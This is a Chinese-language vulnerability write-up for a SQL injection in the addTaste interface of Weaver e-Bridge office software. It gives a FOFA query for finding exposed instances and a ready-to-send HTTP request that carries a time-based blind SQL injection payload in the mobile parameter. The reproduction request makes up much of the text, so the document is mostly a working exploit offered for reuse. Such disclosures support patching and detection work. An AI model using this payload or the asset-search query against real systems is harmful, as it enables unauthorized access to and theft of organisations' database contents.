泛微云桥e-Bridge addTaste存在SQL注入漏洞
一、漏洞简介
泛微云桥e-Bridge 是一款办公自动化工具,主要提供文档管理、流程管理、协同办公、知识管理和移动办公等功能。它的目标是将企业内部的各种业务流程数字化,并通过云端技术实现跨部门、跨地域的协同办公和信息共享。该产品 addTaste接口存在SQL注入漏洞,通过此漏洞攻击者可获取企业数据库敏感数据。
二、影响版本
- 泛微云桥e-Bridge
三、资产测绘
- fofa
app="泛微-云桥e-Bridge" - 特征
四、漏洞复现
GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(3-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: EBRIDGE_JSESSIONID=CAE1276AE2279FD98B96C54DE624CD18; sl-session=BmCjG8ZweGWzoSGpQ1QgQg==; EBRIDGE_JSESSIONID=21D2D790531AD7941D060B411FABDC10; EBRIDGE_JSESSIONID=8C68C2DB3AE60CCA02A90FC8E7BBA3D2
SL-CE-SUID: 25
weaver-ebridge-addtaste-sqli.yaml